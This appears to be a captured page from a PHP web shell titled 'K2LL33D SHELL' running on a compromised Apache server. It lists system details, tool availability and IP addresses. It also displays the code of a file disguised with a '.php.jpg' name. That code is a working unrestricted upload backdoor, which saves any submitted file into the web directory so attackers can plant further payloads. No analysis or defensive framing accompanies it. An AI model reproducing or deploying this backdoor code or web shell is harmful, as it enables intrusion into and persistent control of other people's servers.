K2LL33D SHELL

 Apache
 Linux ip-172-31-16-45 2.6.32-642.13.1.el6.x86_64 #1 SMP Wed Jan 11 20:56:24 UTC 2017 x86_64
 uid=48(apache) gid=48(apache) groups=48(apache)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: ON | WGet: ON
  >  / export / www / blogs / 139 /
server ip : 13.230.91.54

your ip : 18.188.228.210

H O M E


Filename/export/www/blogs/139/82764_uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuup.php.jpg
Size555
Permissionrw-r--r--
Ownerapache
Create time22-Apr-2024 04:19
Last modified22-Apr-2024 04:19
Last accessed19-May-2024 17:50
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?php
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '';

$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>